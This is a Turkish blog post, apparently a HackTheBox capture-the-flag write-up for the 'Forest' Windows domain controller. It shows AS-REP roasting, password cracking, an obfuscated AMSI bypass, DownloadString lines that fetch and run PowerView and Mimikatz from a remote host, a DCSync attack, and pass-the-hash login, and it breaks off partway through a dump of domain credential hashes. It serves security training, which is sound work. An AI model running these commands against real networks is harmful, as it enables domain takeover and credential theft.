{"id":1390,"date":"2021-07-23T15:42:28","date_gmt":"2021-07-23T15:42:28","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1390"},"modified":"2022-06-09T14:50:23","modified_gmt":"2022-06-09T14:50:23","slug":"forest","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/07\/23\/forest\/","title":{"rendered":"Forest"},"content":{"rendered":"\n\n\n\n\n
Makine Ad\u0131<\/th>\nSeviye<\/th>\nOS<\/th>\nLogo<\/th>\n<\/tr>\n<\/thead>\n
Forest<\/a> - HTB<\/td>\nKolay<\/td>\nWindows<\/td>\n\"\"<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

Walkthrough<\/h2>\n

Nmap taramas\u0131 ile ba\u015flayal\u0131m.<\/p>\n

[*] Scan: 53\nStarting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-07-23 10:53 EDT\nNmap scan report for 10.10.10.161\nHost is up (0.082s latency).\nNot shown: 65511 closed ports\nPORT      STATE SERVICE      VERSION\n53\/tcp    open  domain       Simple DNS Plus\n88\/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-23 15:14:44Z)\n135\/tcp   open  msrpc        Microsoft Windows RPC\n139\/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn\n389\/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)\n445\/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)\n464\/tcp   open  kpasswd5?\n593\/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0\n636\/tcp   open  tcpwrapped\n3268\/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)\n3269\/tcp  open  tcpwrapped\n5985\/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n|_http-title: Not Found\n9389\/tcp  open  mc-nmf       .NET Message Framing\n47001\/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n|_http-title: Not Found\n49664\/tcp open  msrpc        Microsoft Windows RPC\n49665\/tcp open  msrpc        Microsoft Windows RPC\n49666\/tcp open  msrpc        Microsoft Windows RPC\n49667\/tcp open  msrpc        Microsoft Windows RPC\n49670\/tcp open  msrpc        Microsoft Windows RPC\n49676\/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0\n49677\/tcp open  msrpc        Microsoft Windows RPC\n49684\/tcp open  msrpc        Microsoft Windows RPC\n49706\/tcp open  msrpc        Microsoft Windows RPC\n49931\/tcp open  msrpc        Microsoft Windows RPC\nNo exact OS matches for host (If you know what OS is running on it, see https:\/\/nmap.org\/submit\/ ).\nTCP\/IP fingerprint:\nOS:SCAN(V=7.91%E=4%D=7\/23%OT=53%CT=1%CU=39597%PV=Y%DS=2%DC=T%G=Y%TM=60FAD88\nOS:A%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10A%TI=I%CI=I%II=I%SS=S%TS=\nOS:A)SEQ(SP=104%GCD=1%ISR=10A%TI=I%II=I%SS=S%TS=A)SEQ(SP=104%GCD=1%ISR=10A%\nOS:TI=I%CI=RD%TS=A)OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54\nOS:DNW8ST11%O5=M54DNW8ST11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%\nOS:W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=\nOS:Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q\nOS:=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%\nOS:A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%\nOS:DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%\nOS:O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD\nOS:=G)IE(R=Y%DFI=N%T=80%CD=Z)\n\nNetwork Distance: 2 hops\nService Info: Host: FOREST; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n|_clock-skew: mean: 2h39m50s, deviation: 4h02m31s, median: 19m49s\n| smb-os-discovery: \n|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)\n|   Computer name: FOREST\n|   NetBIOS computer name: FOREST\\x00\n|   Domain name: htb.local\n|   Forest name: htb.local\n|   FQDN: FOREST.htb.local\n|_  System time: 2021-07-23T08:15:49-07:00\n| smb-security-mode: \n|   account_used: <blank>\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: required\n| smb2-security-mode: \n|   2.02: \n|_    Message signing enabled and required\n| smb2-time: \n|   date: 2021-07-23T15:15:47\n|_  start_date: 2021-07-23T11:35:39\n\nTRACEROUTE (using port 1720\/tcp)\nHOP RTT      ADDRESS\n1   77.02 ms 10.10.14.1\n2   77.16 ms 10.10.10.161\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 165.40 seconds\n<\/code><\/pre>\n
Evet bunun bir DC oldu\u011funu anl\u0131yoruz ve makine ad\u0131 FOREST<\/strong> domain ise htb.local<\/strong>. Bunun \u00fczerine enum4linux<\/code> arac\u0131n\u0131 \u00e7al\u0131\u015ft\u0131rd\u0131m. anonymous logon oldu\u011fu i\u00e7in ldap ile \u00e7ok fazla enumaration i\u015flemi ger\u00e7ekle\u015ftirebildim. enum4linux \u00e7\u0131kt\u0131s\u0131nda \u00f6nemli k\u0131s\u0131mlar\u0131 a\u015fa\u011f\u0131da listeledim.<\/p>\n
enum4linux -a -v 10.10.10.161 | tee enum4linuxResult <\/code><\/pre>\n
[V] Attempting to get userlist with command: rpcclient -W '' -c enumdomusers -U''%'' '10.10.10.161' 2>&1\nuser:[Administrator] rid:[0x1f4]\nuser:[Guest] rid:[0x1f5]\nuser:[krbtgt] rid:[0x1f6]\nuser:[DefaultAccount] rid:[0x1f7]\nuser:[$331000-VK4ADACQNUCA] rid:[0x463]\nuser:[SM_2c8eef0a09b545acb] rid:[0x464]\nuser:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]\nuser:[SM_75a538d3025e4db9a] rid:[0x466]\nuser:[SM_681f53d4942840e18] rid:[0x467]\nuser:[SM_1b41c9286325456bb] rid:[0x468]\nuser:[SM_9b69f1b9d2cc45549] rid:[0x469]\nuser:[SM_7c96b981967141ebb] rid:[0x46a]\nuser:[SM_c75ee099d0a64c91b] rid:[0x46b]\nuser:[SM_1ffab36a2f5f479cb] rid:[0x46c]\nuser:[HealthMailboxc3d7722] rid:[0x46e]\nuser:[HealthMailboxfc9daad] rid:[0x46f]\nuser:[HealthMailboxc0a90c9] rid:[0x470]\nuser:[HealthMailbox670628e] rid:[0x471]\nuser:[HealthMailbox968e74d] rid:[0x472]\nuser:[HealthMailbox6ded678] rid:[0x473]\nuser:[HealthMailbox83d6781] rid:[0x474]\nuser:[HealthMailboxfd87238] rid:[0x475]\nuser:[HealthMailboxb01ac64] rid:[0x476]\nuser:[HealthMailbox7108a4e] rid:[0x477]\nuser:[HealthMailbox0659cc1] rid:[0x478]\nuser:[sebastien] rid:[0x479]\nuser:[lucinda] rid:[0x47a]\nuser:[svc-alfresco] rid:[0x47b]\nuser:[andy] rid:[0x47e]\nuser:[mark] rid:[0x47f]\nuser:[santi] rid:[0x480]\n<\/code><\/pre>\n
svc-alfresco<\/strong> kullan\u0131c\u0131s\u0131 sanki bir servis hesab\u0131 gibi duruyor. Bunun i\u00e7in AS-REP Roasting<\/a> sald\u0131r\u0131s\u0131 yapabiliriz. <\/p>\n
impacket modul\u00fc ile bir sald\u0131r\u0131 denedim ve ba\u015far\u0131l\u0131 oldum. Kullan\u0131c\u0131n\u0131n time-zone eklenmemi\u015f ve b\u00f6ylece offline k\u0131r\u0131lmaya haz\u0131r olan hash'i elime geldi.<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/tool\/AD\/impacket\/examples]\n\u2514\u2500# python3 GetNPUsers.py htb.local\/ -request                                                                                                                                                                                            1 \u2a2f\nImpacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation\n\nName          MemberOf                                                PasswordLastSet             LastLogon                   UAC      \n------------  ------------------------------------------------------  --------------------------  --------------------------  --------\nsvc-alfresco  CN=Service Accounts,OU=Security Groups,DC=htb,DC=local  2021-07-23 06:00:52.505817  2019-09-23 07:09:47.931194  0x410200 \n\n$krb5asrep$23$svc-alfresco@HTB.LOCAL:dccd40229c47374ff029eb9d04ed891b$39430aa263b0c7dea5b5f2898a242a88bc1a6e11912433457b24f5eb0b38ab5634f93f8d03871dc1e8586b22d83019bcbccb0e19b1b8a4d34c845692f35f889901a77424d1f032fb89e801906dabfa082900497e4b60719cea2ef0220ed131c642bcb3c079e6ccfc6edbbbf5ba74c2ae7febe88dc8fd349d9dbb24001752a3ba681d655c6082dcfca19230b0d6616a4fa9ad8ebdc619a931bf8bd9c229bdf0ad302e5f67518a4e1024998e70e5f252ab3c41a51469b22edb7fc1f0e8d990b314dd2b4cf05689853cdf80fd39d9cbd9a5bad402f48f9d79fcdbca2fed53a260f0a5ab1a3d9b9f<\/code><\/pre>\n
Hemen bunu john ile k\u0131rmay\u0131 deneyelim.<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/oscp\/htb\/Forest]\n\u2514\u2500# john -wordlist=\/usr\/share\/wordlists\/rockyou.txt user.hash \nUsing default input encoding: UTF-8\nLoaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17\/18\/23 [MD4 HMAC-MD5 RC4 \/ PBKDF2 HMAC-SHA1 AES 128\/128 AVX 4x])\nWill run 4 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\ns3rvice          ($krb5asrep$23$svc-alfresco@HTB.LOCAL)\n1g 0:00:00:03 DONE (2021-07-23 05:42) 0.2941g\/s 1201Kp\/s 1201Kc\/s 1201KC\/s s401447401447401447..s3r2s1\nUse the "--show" option to display all of the cracked passwords reliably\nSession completed\n<\/code><\/pre>\n
Harika! nmap \u00e7\u0131kt\u0131s\u0131n\u0131 hat\u0131rlarsan\u0131z WinRM'in a\u00e7\u0131k oldu\u011funu g\u00f6r\u00fcrs\u00fcn\u00fcz. 5985 portu bizim i\u00e7in beklemede!<\/p>\n
\n\u250c\u2500\u2500(root💀kali)-[~\/tool\/AD]\n\u2514\u2500# evil-winrm --ip 10.10.10.161 --user svc-alfresco --password s3rvice --port 5985                                                                                                                                                      1 \u2a2f\n\nEvil-WinRM shell v2.4\n\nInfo: Establishing connection to remote endpoint\n\n*Evil-WinRM* PS C:\\Users\\svc-alfresco\\Documents> whoami\nhtb\\svc-alfresco\n*Evil-WinRM* PS C:\\Users\\svc-alfresco\\Documents> hostname\nFOREST\n<\/code><\/pre>\n
Evet i\u00e7eriye girdik ve \u015fimdi ilk flagimize gidelim.<\/p>\n
*Evil-WinRM* PS C:\\Users\\svc-alfresco\\Desktop> ls\n\n    Directory: C:\\Users\\svc-alfresco\\Desktop\n\nMode                LastWriteTime         Length Name\n----                -------------         ------ ----\n-ar---        9\/23\/2019   2:16 PM             32 user.txt\n\n*Evil-WinRM* PS C:\\Users\\svc-alfresco\\Desktop> cat user.txt\ne5e4***********************************\n<\/code><\/pre>\n
Bir hesapla i\u00e7eri girdi\u011fimizde yapmam\u0131z gereken ilk \u015feylerden biri bloodhound \u00e7al\u0131\u015ft\u0131rmak olmal\u0131...<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/oscp\/htb\/Forest\/bloodhound]\n\u2514\u2500# bloodhound-python -d htb.local -u svc-alfresco -p s3rvice  -gc forest.htb.local -ns 10.10.10.161 -c all\nINFO: Found AD domain: htb.local\nINFO: Connecting to LDAP server: FOREST.htb.local\nINFO: Found 1 domains\nINFO: Found 1 domains in the forest\nINFO: Found 2 computers\nINFO: Connecting to LDAP server: FOREST.htb.local\nWARNING: Could not resolve SID: S-1-5-21-3072663084-364016917-1341370565-1153\nINFO: Found 31 users\nINFO: Found 75 groups\nINFO: Found 0 trusts\nINFO: Starting computer enumeration with 10 workers\nINFO: Querying computer: EXCH01.htb.local\nINFO: Querying computer: FOREST.htb.local\nINFO: Done in 00M 20S\n<\/code><\/pre>\n
\u0130nceleme esnas\u0131nda ilgi \u00e7ekici \u015feyler buldum.<\/p>\n
\n
Yukar\u0131daki g\u00f6rsele bakt\u0131\u011f\u0131m\u0131zda g\u00f6rd\u00fc\u011f\u00fcm\u00fcz olay a\u015fa\u011f\u0131da a\u00e7\u0131klanm\u0131\u015ft\u0131r.<\/p>\n
SVC-ALFRESCO@HTB.LOCAL => Member Of => SERVICE ACCOUNTS@HTB.LOCAL => Member Of => PRIVILEGED IT ACCOUNTS@HTB.LOCAL => Member Of => ACCOUNT OPERATORS@HTB.LOCAL => Generic ALL => EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL => WriteDacl => HTB.LOCAL\n<\/code><\/pre>\n
K\u0131sacas\u0131 EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL<\/strong> grubu \u00fczerinde GenericALL<\/strong> haklar\u0131na sahibiz. Ayn\u0131 zamanda bu gruptaki bir kullan\u0131c\u0131da domain \u00fczerinde WriteDacl<\/strong> haklar\u0131na sahip.<\/p>\n
Bloodhound \u00fczerinden WriteDacl<\/strong> ile neler yapabilece\u011fimize bir bakal\u0131m.<\/p>\n
To abuse WriteDacl to a domain object, you may grant yourself the DcSync privileges.\n\nYou may need to authenticate to the Domain Controller as a member of EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL if you are not running a process as a member. To do this in conjunction with Add-DomainObjectAcl, first create a PSCredential object (these examples comes from the PowerView help documentation):\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\n\nThen, use Add-DomainObjectAcl, optionally specifying $Cred if you are not already running a process as EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL:\n\nAdd-DomainObjectAcl -Credential $Cred -TargetIdentity testlab.local -Rights DCSync\n\nOnce you have granted yourself this privilege, you may use the mimikatz dcsync function to dcsync the password of arbitrary principals on the domain\n\nlsadump::dcsync \/domain:testlab.local \/user:Administrator\n\nCleanup can be done using the Remove-DomainObjectAcl function:\nRemove-DomainObjectAcl -Credential $Cred -TargetIdentity testlab.local -Rights DCSync<\/code><\/pre>\n
Harika DCSync ata\u011f\u0131na do\u011fru gidece\u011fiz. \u0130lk \u00f6nce gruba bir kullan\u0131c\u0131 ekleyelim. Daha sonra bu kullan\u0131c\u0131yla WinRM \u00fczerinden i\u015flem yapabilmek i\u00e7in Remote Control grubuna da ekleyelim.<\/p>\n
DCSync attack yapaca\u011f\u0131m i\u00e7in Powersploit reposundan PowerView.ps1'i kendi kalime kopyalad\u0131m ve daha sonras\u0131nda CRTP yeteneklerimle makineye dahil ettim.<\/p>\n
*Evil-WinRM* PS C:\\Users\\svc-alfresco\\Desktop> \n*Evil-WinRM* PS C:\\Users\\svc-alfresco\\Desktop> powershell -ep bypass\nWindows PowerShell\nCopyright (C) 2016 Microsoft Corporation. All rights reserved.\n\nPS C:\\Users\\svc-alfresco\\Desktop>\n*Evil-WinRM* PS C:\\Users\\svc-alfresco\\Desktop> sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )\n*Evil-WinRM* PS C:\\Users\\svc-alfresco\\Desktop> \n*Evil-WinRM* PS C:\\Users\\svc-alfresco\\Desktop> iex ((New-Object Net.WebClient).DownloadString('http:\/\/10.10.14.35:1111\/PowerView.ps1'));\n<\/code><\/pre>\n
\u015eimdi bir kontrol yap\u0131p yeni bir kullan\u0131c\u0131 olu\u015ftural\u0131m.<\/p>\n
*Evil-WinRM* PS C:\\Users\\svc-alfresco\\Desktop> Get-NetGroupMember "Exchange Windows Permissions" | select MemberName\n\nMemberName\n----------\nExchange Trusted Subsystem\n\n*Evil-WinRM* PS C:\\Users\\svc-alfresco\\Desktop> net user kuday Password1 \/ADD \/DOMAIN\nThe command completed successfully.\n\n*Evil-WinRM* PS C:\\Users\\svc-alfresco\\Desktop> net group "Exchange Windows Permissions" kuday \/ADD \/DOMAIN\nThe command completed successfully.\n\n*Evil-WinRM* PS C:\\Users\\svc-alfresco\\Desktop> Get-NetGroupMember "Exchange Windows Permissions" | select MemberName\n\nMemberName\n----------\nkuday\nExchange Trusted Subsystem\n\n*Evil-WinRM* PS C:\\Users\\svc-alfresco\\Desktop> \n<\/code><\/pre>\n
Son olarak WinRM i\u015flemlerini ayarlayal\u0131m.<\/p>\n
*Evil-WinRM* PS C:\\Users\\svc-alfresco\\Documents> net localgroup 'Remote Management Users' kuday \/add\nThe command completed successfully.\n\n*Evil-WinRM* PS C:\\Users\\svc-alfresco\\Documents> exit\n\nInfo: Exiting with code 0\n\n\u250c\u2500\u2500(root💀kali)-[~\/tool\/AD]\n\u2514\u2500# evil-winrm --ip 10.10.10.161 --user kuday --password Password1 --port 5985      \n\nEvil-WinRM shell v2.4\n\nInfo: Establishing connection to remote endpoint\n\n*Evil-WinRM* PS C:\\Users\\kuday\\Documents> whoami\nhtb\\kuday\n*Evil-WinRM* PS C:\\Users\\kuday\\Documents> <\/code><\/pre>\n
Evet a\u015fa\u011f\u0131da yapt\u0131\u011f\u0131m i\u015flemleri k\u0131saca \u015fimdi anlatayim. kuday<\/strong> kullan\u0131c\u0131s\u0131 ile WinRM arac\u0131l\u0131\u011f\u0131yla makineye ba\u011fland\u0131k. Daha sonras\u0131nda rahat \u00e7al\u0131\u015fabilece\u011fimiz powershell ortam\u0131m\u0131z\u0131 olu\u015fturduk. Bunlar -ep ve AMSI bypass<\/strong> Daha sonras\u0131nda powerview.ps1'i RAM'e y\u00fckledim ve kuday kullan\u0131c\u0131s\u0131na DCSync haklar\u0131n\u0131 verdim. Bunun \u00fczerine Invoke-Mimikatz indirdim ve DCSYNC sald\u0131r\u0131s\u0131 ger\u00e7ekle\u015ftirdim. B\u00f6ylece Administrator kullan\u0131c\u0131s\u0131n\u0131n hash'ini ald\u0131m.<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/tool\/AD]\n\u2514\u2500# evil-winrm --ip 10.10.10.161 --user kuday --password Password1 --port 5985 \n\nEvil-WinRM shell v2.4\n\nInfo: Establishing connection to remote endpoint\n\n*Evil-WinRM* PS C:\\Users\\kuday\\Documents> powershell -ep bypass\nWindows PowerShell\nCopyright (C) 2016 Microsoft Corporation. All rights reserved.\n\nPS C:\\Users\\kuday\\Documents>\n*Evil-WinRM* PS C:\\Users\\kuday\\Documents> sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )\n*Evil-WinRM* PS C:\\Users\\kuday\\Documents> iex ((New-Object Net.WebClient).DownloadString('http:\/\/10.10.14.35:1111\/PowerView.ps1'));\n*Evil-WinRM* PS C:\\Users\\kuday\\Documents> Add-DomainObjectAcl -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity kuday -Rights DCSync\n*Evil-WinRM* PS C:\\Users\\kuday\\Documents> iex ((New-Object Net.WebClient).DownloadString('http:\/\/10.10.14.35:1111\/Invoke-Mimikatz.ps1 '));\n*Evil-WinRM* PS C:\\Users\\kuday\\Documents> Invoke-Mimikatz -Command '"lsadump::dcsync \/user:htb\\Administrator"'\nAccess denied \nAt line:2580 char:27\n+             $Processors = Get-WmiObject -Class Win32_Processor\n+                           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n    + CategoryInfo          : InvalidOperation: (:) [Get-WmiObject], ManagementException\n    + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand\nThe property 'AddressWidth' cannot be found on this object. Verify that the property exists.\nAt line:2594 char:14\n+ ...        if ( ( $Processor.AddressWidth) -ne (([System.IntPtr]::Size)*8 ...\n+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n    + CategoryInfo          : NotSpecified: (:) [], PropertyNotFoundException\n    + FullyQualifiedErrorId : PropertyNotFoundStrict\n\n  .#####.   mimikatz 2.2.0 (x64) #18362 Oct 30 2019 13:01:25\n .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)\n ## \/ \\ ##  \/*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n ## \\ \/ ##       > http:\/\/blog.gentilkiwi.com\/mimikatz\n '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )\n  '#####'        > http:\/\/pingcastle.com \/ http:\/\/mysmartlogon.com   ***\/\n\nmimikatz(powershell) # lsadump::dcsync \/user:htb\\Administrator\n[DC] 'htb.local' will be the domain\n[DC] 'FOREST.htb.local' will be the DC server\n[DC] 'htb\\Administrator' will be the user account\n\nObject RDN           : Administrator\n\n** SAM ACCOUNT **\n\nSAM Username         : Administrator\nUser Principal Name  : Administrator@htb.local\nAccount Type         : 30000000 ( USER_OBJECT )\nUser Account Control : 00000200 ( NORMAL_ACCOUNT )\nAccount expiration   :\nPassword last change : 9\/18\/2019 10:09:08 AM\nObject Security ID   : S-1-5-21-3072663084-364016917-1341370565-500\nObject Relative ID   : 500\n\nCredentials:\n  Hash NTLM: 32693b11e6aa90eb43d32c72a07ceea6\n<\/code><\/pre>\n
\u015eimdi bu hash ile oturum a\u00e7may\u0131 deneyelim.<\/p>\n
\n\u250c\u2500\u2500(root💀kali)-[~\/tool\/AD\/impacket\/examples]\n\u2514\u2500# python3 wmiexec.py -hashes 32693b11e6aa90eb43d32c72a07ceea6:32693b11e6aa90eb43d32c72a07ceea6 htb.local\/Administrator@10.10.10.161                                                                                                    1 \u2a2f\nImpacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation\n\n[*] SMBv3.0 dialect used\n[!] Launching semi-interactive shell - Careful what you execute\n[!] Press help for extra shell commands\nC:\\>whoami\nhtb\\administrator\n\nC:\\>dir\n Volume in drive C has no label.\n Volume Serial Number is E8B0-D68E\n\n Directory of C:\\\n\n09\/20\/2019  01:18 PM    <DIR>          PerfLogs\n09\/22\/2019  04:56 PM    <DIR>          Program Files\n11\/20\/2016  07:36 PM    <DIR>          Program Files (x86)\n07\/23\/2021  05:45 AM    <DIR>          Users\n07\/23\/2021  06:51 AM    <DIR>          Windows\n               0 File(s)              0 bytes\n               5 Dir(s)  31,452,336,128 bytes free\n\nC:\\>cd Users\nC:\\Users>cd Administrator\nC:\\Users\\Administrator>cd Desktop\nC:\\Users\\Administrator\\Desktop>dir\n Volume in drive C has no label.\n Volume Serial Number is E8B0-D68E\n\n Directory of C:\\Users\\Administrator\\Desktop\n\n09\/23\/2019  02:15 PM    <DIR>          .\n09\/23\/2019  02:15 PM    <DIR>          ..\n09\/23\/2019  02:15 PM                32 root.txt\n               1 File(s)             32 bytes\n               2 Dir(s)  31,452,336,128 bytes free\n\nC:\\Users\\Administrator\\Desktop>type root.txt\nf048***********************************\n<\/code><\/pre>\n
Harika! CRTP'den dolay\u0131 hala kali \u00fczerindeki tool'lar biraz tuhaf geliyor. Elimden geldi\u011fince bu y\u00fczden ayn\u0131 i\u015flemleri kali \u00fczerinde de ger\u00e7ekle\u015ftirmeye \u00e7al\u0131\u015f\u0131yorum. \u015eimdi kali \u00fczerinden DCSync sald\u0131r\u0131s\u0131 yapala\u0131m ve dumplar\u0131 alal\u0131m.<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/tool\/AD\/impacket\/examples]\n\u2514\u2500# python3 secretsdump.py htb.local\/kuday:Password1@10.10.10.161                                                                                                                                                                        1 \u2a2f\nImpacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation\n\n[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied \n[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)\n[*] Using the DRSUAPI method to get NTDS.DIT secrets\nhtb.local\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nkrbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::\nDefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nhtb.local\\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nhtb.local\\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nhtb.local\\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nhtb.local\\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nhtb.local\\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nhtb.local\\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nhtb.local\\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nhtb.local\\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nhtb.local\\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nhtb.local\\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nhtb.local\\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::\nhtb.local\\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::\nhtb.local\\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::\nhtb.local\\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::\nhtb.local\\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::\nhtb.local\\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::\nhtb.local\\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::\nhtb.local\\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::\nhtb.local\\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::\nhtb.local\\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::\nhtb.local\\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::\nhtb.local\\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::\nhtb.local\\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::\nhtb.local\\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::\nhtb.local\\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::\nhtb.local\\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::\nhtb.local\\santi:1152:aad3b